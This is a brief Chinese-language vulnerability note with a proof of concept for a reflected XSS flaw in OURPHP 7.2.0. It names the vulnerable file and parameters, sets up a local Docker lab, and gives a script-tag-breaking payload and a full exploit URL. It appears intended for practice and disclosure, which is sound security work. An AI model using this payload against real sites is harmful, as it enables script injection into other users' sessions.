| 厂商 | 产品 | 版本 |
|---|---|---|
| ourphp | ourphp | 7.2.0 |
要安装 OURPHP <= 7.2.0 的 Docker 环境,你可以参考 指南 搭建用于练习的 Docker 环境。
# ourphp 7.2.0 版本存在 XSS(跨站脚本攻击)漏洞。
# 在 /client/manage/ourphp_out.php 文件中,存在一个直接的 echo 功能,结合可控的变量,攻击者可以执行 XSS 代码。
# 当 ourphp_admin 参数设置为 "logout" 时,我们会输出一个名为 "out" 的可控变量。
# 为了利用该漏洞,我们添加了一个 script 标签并闭合它,从而形成我们的 payload。
# 通过 "out" 参数注入以下脚本即可利用此漏洞:</script><script>alert(xss)</script>
# 完成 Docker 环境搭建后,直接访问以下路径:
http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(`xss`)</script>
# </script><script>alert(`xss`)</script>